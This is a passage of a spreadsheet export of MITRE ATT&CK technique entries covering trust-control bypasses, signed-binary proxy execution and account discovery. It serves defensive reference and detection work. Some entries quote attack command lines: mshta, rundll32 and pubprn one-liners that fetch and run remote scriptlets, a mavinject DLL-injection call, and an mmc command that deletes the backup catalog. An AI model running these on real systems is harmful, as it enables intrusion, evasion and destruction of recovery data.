Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)
Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>Subvert Trust Controls: SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: CMSTP</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Control Panel</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: InstallUtil</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: MMC</t>
  </si>
  <si>
    <t>Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. 
Adversaries may use MMC commands to perform malicious tasks. For example, &lt;code&gt;mmc wbadmin.msc delete catalog -quiet&lt;/code&gt; deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: &lt;code&gt;wbadmin.msc&lt;/code&gt; may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: &lt;code&gt;mmc.exe -Embedding C:\path\to\test.msc&lt;/code&gt;.(Citation: abusing_com_reg)</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Mavinject</t>
  </si>
  <si>
    <t>Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. &lt;code&gt;C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. 
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  &lt;code&gt;/HMODULE&lt;/code&gt; command-line parameter (ex. &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Mshta</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Msiexec</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Odbcconf</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction&lt;/code&gt;, rundll32.exe would first attempt to execute &lt;code&gt;ExampleFunctionW&lt;/code&gt;, or failing that &lt;code&gt;ExampleFunctionA&lt;/code&gt;, before loading &lt;code&gt;ExampleFunction&lt;/code&gt;). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending &lt;code&gt;W&lt;/code&gt; and/or &lt;code&gt;A&lt;/code&gt; to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) </t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Verclsid</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>System Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution: MSBuild</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Weaken Encryption: Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Account Discovery: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Account Discovery: Domain Account</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.  </t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Account Discovery: Email Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Account Discovery: Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Cloud Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
